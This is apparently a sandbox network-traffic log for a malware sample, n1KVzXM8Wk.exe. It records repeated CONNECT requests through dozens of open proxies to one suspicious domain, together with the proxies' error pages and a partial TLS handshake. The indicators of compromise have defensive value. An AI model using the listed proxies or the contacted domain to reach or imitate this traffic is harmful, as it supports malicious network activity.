                                                                                                      Feb 23, 2024 09:45:15.167996883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      8192.168.2.44975979.10.114.97806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.169914961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.363871098 CET310INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:45:14 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 150
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      9192.168.2.4498108.213.128.904436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.182266951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      10192.168.2.449791104.16.108.149806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.201142073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.288501024 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      11192.168.2.44977491.205.197.22680806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.230982065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      12192.168.2.449790165.225.32.114104176812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.234656096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.358661890 CET1286INHTTP/1.1 403 Forbidden
                                                                                                      Content-Type: text/html
                                                                                                      Server: Zscaler/6.2
                                                                                                      Cache-Control: no-cache
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Content-length: 13631
                                                                                                      Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 61 6c 65 72 74 68 72 65 65 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d 61 78 2d 68 65 69 67 68 74 3a 37 35 70 78 3b 0a 6d 61 78 2d 77 69 64 74 68 3a 34 33 30 70 78 3b 0a 7d 0a 2e 70 67 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0a 74 6f 70 3a 30 3b 0a 62 6f 74 74 6f 6d 3a 30 3b 0a 6c 65 66 74 3a 30 3b 0a 72 69 67 68 74 3a 30 3b 0a 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 0a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 0a 7d 0a 2e 70 67 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 22 22 3b 0a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a
                                                                                                      Data Ascii: ...# Id: closedproxy.html 285144 2021-06-16 05:02:06Z szhang --><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"><html><head><meta name="description" content="Zscaler makes the internet safe for businesses by protecting their employees from malware, viruses, and other security threats."><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Internet Security by Zscaler</title><script language="JavaScript">var defLang = 'en_US'</script>...<img alt="Zscaler" src="https://login.zscalerthree.net/img_logo_new1.png">--><style type="text/css">body {background-color:#e3e3e3;font-family:Arial, sans-serif;font-size:12px;color:#4B4F54;}a {cursor:pointer;text-decoration:none;color:#009dd0;}table {margin-top:10px;}td table {margin-top:0;text-align:center;}img {max-height:75px;max-width:430px;}.pg {position:absolute;top:0;bottom:0;left:0;right:0;overflow-x:hidden;white-space:nowrap;}.pg:before {content:"";display:inline-block;


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      13192.168.2.44978396.114.36.9806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.251243114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.418770075 CET204INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Proxy-Connection: close
                                                                                                      Via: http/1.1 buildhw-08.phx2.fedoraproject.org (ApacheTrafficServer/5.3.0 [uSc s f p eN:tMc i p s ])
                                                                                                      Server: ATS/5.3.0
                                                                                                      Feb 23, 2024 09:45:15.419794083 CET202OUTData Raw: 16 03 03 00 c5 01 00 00 c1 03 03 65 d8 5b 1b 5a 6b ca de 43 2f 03 a9 10 55 b3 76 2a 9a d6 3c 16 0d 4e 81 ca 6b e4 7b b4 12 2a 21 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                      Data Ascii: e[ZkC/Uv*<Nk{*!*,+0/$#('=<5/n-+(heygirlisheeverythingyouwantedinaman.com#
                                                                                                      Feb 23, 2024 09:45:15.591964960 CET536INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 d8 5b 1b fc 20 f7 2e 8b cf 53 6e cf 40 8f 8d 03 26 4c 1b a2 aa c6 19 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 cb 0b 00 10 c7 00
                                                                                                      Data Ascii: C?e[ .Sn@&LDOWNGRD/#00`4ZmQ0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240212203110Z240512203109Z03110/
                                                                                                      Feb 23, 2024 09:45:15.591980934 CET536INData Raw: 19 a4 a8 41 83 af 8a 57 a5 1c 9b d3 40 df 70 a4 4f 36 6b d9 eb 42 48 01 2b 9b e1 b4 10 c8 e0 be 54 99 35 35 3d e1 fe fa 2c 2e f9 02 03 01 00 01 a3 82 02 bc 30 82 02 b8 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 05 a0 30 13 06 03 55 1d 25 04 0c 30
                                                                                                      Data Ascii: AW@pO6kBH+T55=,.00U0U%0+0U00Up:xy(0U#0n+_+0x+l0j05+0)http://ocsp.pki.goog/s/gts1p5/uFgUyufpvHQ0
                                                                                                      Feb 23, 2024 09:45:15.591996908 CET536INData Raw: 68 42 0a 9f e6 67 4c 5a 3a 74 00 00 01 8d 9f 3b 2a d8 00 00 04 03 00 48 30 46 02 21 00 de 50 0b 84 a3 1b 02 2e 55 c0 38 37 8d 5a c4 57 63 34 9e 3e d6 2f c6 08 49 14 e3 02 9d 9e a4 02 02 21 00 b2 bc 14 60 a8 23 89 33 60 f2 4a be 67 47 48 1d b0 03
                                                                                                      Data Ascii: hBgLZ:t;*H0F!P.U87ZWc4>/I!`#3`JgGHw)BA;vk?"\kpqlQ4=0H;*G0E!e+"\fqxfn7~V m+TU JA0%gV+Nswm0*H@hd*
                                                                                                      Feb 23, 2024 09:45:15.592067957 CET536INData Raw: 05 00 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 14 30 12 06 03 55 04 03 13 0b 47 54 53 20 52 6f 6f 74 20 52 31 30 1e 17 0d 32 30 30
                                                                                                      Data Ascii: 0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10200813000042Z270930000042Z0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50"0*H0$-D[>eO
                                                                                                      Feb 23, 2024 09:45:15.592083931 CET536INData Raw: 01 ff 04 08 30 06 01 01 ff 02 01 00 30 1d 06 03 55 1d 0e 04 16 04 14 d5 fc 9e 0d df 1e ca dd 08 97 97 6e 2b c5 5f c5 2b f5 ec b8 30 1f 06 03 55 1d 23 04 18 30 16 80 14 e4 af 2b 26 71 1a 2b 48 27 85 2f 52 66 2c ef f0 89 13 71 3e 30 68 06 08 2b 06
                                                                                                      Data Ascii: 00Un+_+0U#0+&q+H'/Rf,q>0h+\0Z0&+0http://ocsp.pki.goog/gtsr100+0$http://pki.goog/repo/certs/gtsr1.der04U-0+0)'%#http://crl.pki.goog/gtsr1/gtsr1.crl0MU
                                                                                                      Feb 23, 2024 09:45:15.592101097 CET536INData Raw: 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de 3d b0 c8 ef 30 7a 24 2d be b8 b3 86
                                                                                                      Data Ascii: citoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*j%[
                                                                                                      Feb 23, 2024 09:45:15.592116117 CET536INData Raw: 06 03 55 04 03 13 0b 47 54 53 20 52 6f 6f 74 20 52 31 30 82 02 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 02 0f 00 30 82 02 0a 02 82 02 01 00 b6 11 02 8b 1e e3 a1 77 9b 3b dc bf 94 3e b7 95 a7 40 3c a1 fd 82 f9 7d 32 06 82 71 f6 f6 8c
                                                                                                      Data Ascii: UGTS Root R10"0*H0w;>@<}2qj.K+^R#'c~^hZGM3NlKd)%#=.`HMzY1.ml~&E=y(&<hS:+
                                                                                                      Feb 23, 2024 09:45:15.592133045 CET536INData Raw: b0 d6 71 fa f4 c1 ba cc ed 1b f5 fe 81 41 d8 00 98 3d 3a c8 ae 7a 98 37 18 05 95 02 03 01 00 01 a3 82 01 38 30 82 01 34 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 01 86 30 0f 06 03 55 1d 13 01 01 ff 04 05 30 03 01 01 ff 30 1d 06 03 55 1d 0e 04 16
                                                                                                      Data Ascii: qA=:z78040U0U00U+&q+H'/Rf,q>0U#0`{fEP/}4K0`+T0R0%+0http://ocsp.pki.goog/gsr10)+0http://pki.goog/gsr1/gsr1.crt02U
                                                                                                      Feb 23, 2024 09:45:15.592150927 CET402INData Raw: e3 32 fa a7 6e 06 6a 6f bd 8b 91 ee 16 4b e8 3b a9 b3 37 e7 c3 44 a4 7e d8 6c d7 c7 46 f5 92 9b e7 d5 21 be 66 92 19 94 55 6c d4 29 b2 0d c1 66 5b e2 77 49 48 28 ed 9d d7 1a 33 72 53 b3 82 35 cf 62 8b c9 24 8b a5 b7 39 0c bb 7e 2a 41 bf 52 cf fc
                                                                                                      Data Ascii: 2njoK;7D~lF!fUl)f[wIH(3rS5b$9~*AR?,( r"eWZ!WYqf\KJNQc?)[a9-Bh^zg5\<F!Ma1aa]G<


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      14192.168.2.449744221.231.13.19810806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.252376080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.594077110 CET309INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.22.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      15192.168.2.449785199.102.107.14541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.263973951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      16192.168.2.449756102.212.86.5780806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.273263931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      17192.168.2.449787199.102.105.24241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.273549080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      18192.168.2.449788141.94.174.636016812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.273817062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      19192.168.2.449740159.223.71.71499226812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.312741041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      20192.168.2.4498073.9.71.16731286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.321115971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.841831923 CET65INHTTP/1.1 200 Connection Established
                                                                                                      Content-Type: text/plain


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      21192.168.2.449825104.16.221.57806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.341479063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.428819895 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      22192.168.2.44987943.153.175.434436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.348139048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      23192.168.2.44981350.63.13.3116736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.349215031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.756165028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.193767071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      24192.168.2.449760103.134.38.8956786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.355576038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      25192.168.2.449841172.67.182.83806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.376439095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:15.464406967 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:15 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      26192.168.2.449811213.252.245.22161206812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:15.384031057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      27192.168.2.449866104.20.225.218806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
